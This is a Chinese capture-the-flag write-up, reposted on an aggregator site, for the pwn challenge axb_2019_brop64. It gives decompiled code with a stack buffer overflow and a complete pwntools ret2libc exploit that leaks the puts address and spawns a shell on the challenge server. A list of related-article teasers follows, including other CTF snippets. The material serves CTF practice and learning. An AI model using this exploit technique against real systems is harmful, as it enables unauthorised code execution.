axb_2019_brop64

axb_2019_brop64

news2025/1/12 20:54:19

axb_2019_brop64

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

64位，只开了NX

__int64 repeater()
{
  size_t v1; // rax
  char s[208]; // [rsp+0h] [rbp-D0h] BYREF

  printf("Please tell me:");
  memset(s, 0, 0xC8uLL);
  read(0, s, 0x400uLL);
  if ( !strcmp(s, "If there is a chance,I won't make any mistake!\n") )
  {
    puts("Wish you happy everyday!");
  }
  else
  {
    printf("Repeater:");
    v1 = strlen(s);
    write(1, s, v1);
  }
  return 0LL;
}

程序很简单，有一点点花里胡哨，看到栈溢出，看一下有没有坑点（x

思路

ret2libc，打的puts，

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26296,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
libc=ELF('libc-2.23.so')

rdi=0x0000000000400963
pl=cyclic(0xd8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400845)
sla('me',pl)
leak=get_addr_u64()-libc.sym['puts']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0xd8)+p64(rdi)+p64(sh)+p64(sys)
sla('me',pl)

ia(c)

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1058205.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

1200*C. Make It Good（二分 || 贪心）

1200*C. Make It Good（二分 || 贪心）

Make It Good - 洛谷 Problem - 1385C - Codeforces 思路一： 二分答案，每次check从mid1开始，判断能否形成要求的序列。 #include<bits/stdc.h> using namespace std; #define int long long const int N2e55; int t,n,a[N]; bool che…

阅读更多...

栈的应用场景(三)

栈的应用场景(三)

最小栈 1.题目2.画图分析3.代码实现 1.题目 2.画图分析 3.代码实现 package Stack;import java.util.Stack; public class MinStack {private Stack <Integer> stack;private Stack <Integer> MinStack;public MinStack() {stack new Stack<>();MinStack …

阅读更多...

JAVA学习(2)-全网最详细~

JAVA学习(2)-全网最详细~

🌈write in front🌈 🧸大家好，我是Aileen🧸.希望你看完之后，能对你有所帮助，不足请指正！共同学习交流. 🆔本文由Aileen_0v0🧸 原创 CSDN首发🐒 如…

阅读更多...

jarvisoj_level5

jarvisoj_level5

jarvisoj_level5 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x3fe000)64位，只开了NX ssize_t vulnerable_function() {char buf[128]; // [rsp0h] [rbp-80h] BYREFwrite(1, "Input:\…

阅读更多...

【网络通信三要素】TCP与UDP快速入门

【网络通信三要素】TCP与UDP快速入门

网络通信三要素 1.什么是网络编程？ 可以让设备中的程序，与网络上其他设备中的程序进行数据交互，从而实现网络通信的手段，java.net.*包下提供了网络编程的解决方案 2.基本的通信架构基本的通信架构有2种形式：CS架构…

阅读更多...

【Spring MVC】MVC如何浏览器请求（service方法）

【Spring MVC】MVC如何浏览器请求（service方法）

文章目录 1. DispatcherServlet 的 service 方法1.1. processRequest 方法1.2. doService 方法背景：平时我们学习 MVC 重点关注的时DispatcherServlet 的 doDispatcher 方法，但是在 doDispatcher 方法之前还有请求处理的前置过程，这个过程…

阅读更多...

javaWeb学生信息管理

javaWeb学生信息管理

一、引言学生信息管理系统是基于Java Web技术开发的一个全栈应用，用于管理学生的基本信息。本系统采用Eclipse作为开发工具，Navicat用于MySQL数据库管理，运行在JDK1.8、Tomcat9.0、MySQL8.0环境下。前端采用JavaScript、jQuery、Bootstrap4…

阅读更多...

大语言模型之十四-PEFT的LoRA

大语言模型之十四-PEFT的LoRA

在《大语言模型之七- Llama-2单GPU微调SFT》和《大语言模型之十三 LLama2中文推理》中我们都提到了LoRA（低秩分解）方法，之所以用低秩分解进行参数的优化的原因是为了减少计算资源。我们以《大语言模型之四-LlaMA-2从模型到应用》一文中的图…

阅读更多...

14:00面试，14:06就出来了，这问的过于变态了。。。

14:00面试，14:06就出来了，这问的过于变态了。。。

前言刚从小厂出来，没想到在另一家公司我又寄了。在这家公司上班，每天都要加班，但看在钱给的比较多的份上，也就不太计较了。但万万没想到5月一纸通知，所有人不准加班了，不仅加班费没有了，薪资…

阅读更多...

Linux: 进程（控制）

Linux: 进程（控制）

目录 1.进程的创建 1.1fork函数 1.2fork创建子进程,OS做了什么？ 1.3为什么要写实拷贝？ 2.进程的终止 2.1进程终止，操作系统做了什么？ 2.2进程常见的退出方式 2.3进程常见的退出方法 3.进程的等待 3.1为什么进行进程等待…

阅读更多...

SpringCloud Alibaba - Seata 部署 TC 服务，并集成微服务

SpringCloud Alibaba - Seata 部署 TC 服务，并集成微服务

目录一、Seata 架构 1.1、Seata 架构重要角色 1.2、部署 TC 服务 1.2.1、前言 1.2.2、下载 seata-server 包，解压 1.2.3、修改配置 1.2.4、在 nacos 中添加配置 1.2.5、创建数据库表 1.2.6、启动 TC 服务 1.3、微服务集成 Seata 1.3.1、引入依赖 1.3.2、…

阅读更多...

面试题：熟悉设计模式吗？谈谈简单工厂模式和策略模式的区别

面试题：熟悉设计模式吗？谈谈简单工厂模式和策略模式的区别

刚刚接触设计模式的时候，我相信单例模式和工厂模式应该是用的最多的，毕竟很多的底层代码几乎都用了这些模式。自从接触了一次阿里的公众号发的一次文章关于 DDD的使用以后，就逐渐接触了策略模式。现在在项目中运用最多的也是这几种设计模式了…

阅读更多...

使用mysql的cmd窗口，运行项目中的mapper层xml里的sql语句，查看运行结果

使用mysql的cmd窗口，运行项目中的mapper层xml里的sql语句，查看运行结果

使用mysql的cmd窗口，运行项目中的mapper层xml里的sql语句，查看运行结果项目代码或者从控制台复制sql语句从控制台搜索方式运行效果或者使用idea的console窗口运行查看结果点击进入，查看表结构与字段其他技巧根据from 表名寻找对应的sql代码…

阅读更多...

Linux系统编程系列之线程属性

Linux系统编程系列之线程属性

一、什么是线程属性线程属性就是线程的属性，是一个用于控制线程行为和功能的参数集合。它可以影响线程的优先级、调度、同步行为和资源管理等方面。线程有许多属性，如分离属性，继承策略，调度策略等。看图二、线程属性的特性 1、…

阅读更多...

ctfshow 命令执行（40-50）

ctfshow 命令执行（40-50）

web40 题目过滤了很多 if(isset($_GET[c])){$c $_GET[c];if(!preg_match("/[0-9]|\~|\|\|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\|\|\{|\[|\]|\}|\:|\|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){eval($c);}}else{highlight_file(__FILE_…

阅读更多...

pycharm 中的一个非常好使用的智能提示tabnine(大大提高代码的书写效率)

pycharm 中的一个非常好使用的智能提示tabnine(大大提高代码的书写效率)

一. pycharm 中的代码智能提示插件有时候,我们总是在写代码的时候,敲全部的代码,太过于麻烦了,如果有一个软件可以预知你的后续的操作,提前将代码给你写出来,你只需要检查对错,就可以了,这样就大大提高了工作的效率. 上面的一个插件是汉化pycharm的软件包,也是非常好用的一款…

阅读更多...

小谈设计模式（14）—建造者模式

小谈设计模式（14）—建造者模式

小谈设计模式（14）—建造者模式专栏介绍专栏地址专栏介绍建造者模式角色分类产品（Product）抽象建造者（Builder）具体建造者（Concrete Builder）指挥者（Director&#xff0…

阅读更多...

分享一款开源的QT的串口示波器

分享一款开源的QT的串口示波器

分享一款开源的QT的串口示波器，完全开源，支持串口、TCP、波形显示、通信协议。 Sailor Project功能说明串口调试助手功能支持传统的串口调试助手的基本收发功能，同时可以刷新大量的数据而不卡顿支持保存接收的数据支持最大200条可编辑…

阅读更多...

cadence SPB17.4 S032 - Update Symbols失败的问题

cadence SPB17.4 S032 - Update Symbols失败的问题

文章目录 cadence SPB17.4 S032 - Update Symbols失败的问题概述笔记END cadence SPB17.4 S032 - Update Symbols失败的问题概述铺铜后, 进行DRC, 发现安装孔不太合适, 有DRC警告. 安装孔是一大孔, 上面打了一圈小孔. 这些小孔有警告, 说孔和孔之间不能干涉. 开始将这些DRC…

阅读更多...

vue3+ts创建前端blog项目

vue3+ts创建前端blog项目

vue3创建blog项目 cmd创建Manually select featuresChoose Vue versionUse class-style component syntax? (Y/n)Use Babel alongside TypeScript (required for modern mode, auto-detected polyfills, transpiling JSX)? (Y/n)Use history mode for router?Pick a CSS pre…

阅读更多...

推荐文章

最新文章